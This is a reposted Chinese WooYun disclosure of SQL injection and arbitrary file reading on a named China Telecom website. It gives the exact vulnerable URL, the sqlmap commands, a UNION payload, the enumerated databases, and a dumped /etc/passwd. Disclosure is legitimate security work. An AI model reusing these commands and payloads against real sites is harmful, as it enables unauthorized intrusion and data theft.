记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

中国电信某站SQL注射+任意文件读取漏洞

2014-07-04 16:25

号码百事通车友圈 http://auto.118114.cn/

从新注册用户的UID可以推断出该站约有5W多会员。

在 http://auto.118114.cn/entry 注册页面选择"企业用户注册",选择一个省份后抓取到一条HTTP请求:

04.jpg



http://auto.118114.cn/block/loginact?act=get_areas&pcode=110000&registercateg=1&v=37



其中, pcode参数存在SQL注射。

漏洞证明:

sqlmap.py -u "http://auto.118114.cn/block/loginact?act=get_areas&pcode=110000&registercateg=1&v=37" --dbs --current-user --current-db



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: pcode

Type: UNION query

Title: MySQL UNION query (NULL) - 5 columns

Payload: act=get_areas&pcode=110000 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716e6f7471,0x4856624675454663676a,0x7169626a71),NULL#&registercateg=1&v=37

---

web server operating system: Linux Ubuntu 8.04 (Hardy Heron)

web application technology: Apache 2.2.8

back-end DBMS: MySQL 5

current user: 'root@localhost'

current database: 'ucenter'

available databases [10]:

[*] 114

[*] gcn1

[*] information_schema

[*] itoa

[*] mysql

[*] phpmyadmin

[*] sns_ibesttone

[*] ucenter

[*] ucenter1

[*] ucenter2



sqlmap.py -u "http://auto.118114.cn/block/loginact?act=get_areas&pcode=110000&registercateg=1&v=37" --file-read="/etc/passwd"



root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

proxy:x:13:13:proxy:/bin:/bin/sh

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/bin/sh

list:x:38:38:Mailing List Manager:/var/list:/bin/sh

irc:x:39:39:ircd:/var/run/ircd:/bin/sh

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

libuuid:x:100:101::/var/lib/libuuid:/bin/sh

dhcp:x:101:102::/nonexistent:/bin/false

syslog:x:102:103::/home/syslog:/bin/false

klog:x:103:104::/home/klog:/bin/false

mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false

sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin

bst:x:1000:1000:bst,,,:/home/bst:/bin/bash

ftp:x:106:65534::/home/ftp:/bin/false

ftp1:x:1002:1003::/home/ftp1:/bin/sh

bstftp:x:1003:1005::/var/www:/bin/sh

bst1:x:1004:1006::/home/bst1:/bin/sh

oracle:x:1005:1007::/home/oracle:/bin/bash

postfix:x:107:116::/var/spool/postfix:/bin/false

修复方案:

电信更专业:)


知识来源: www.wooyun.org/bugs/wooyun-2014-061174

阅读:82122 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“中国电信某站SQL注射+任意文件读取漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云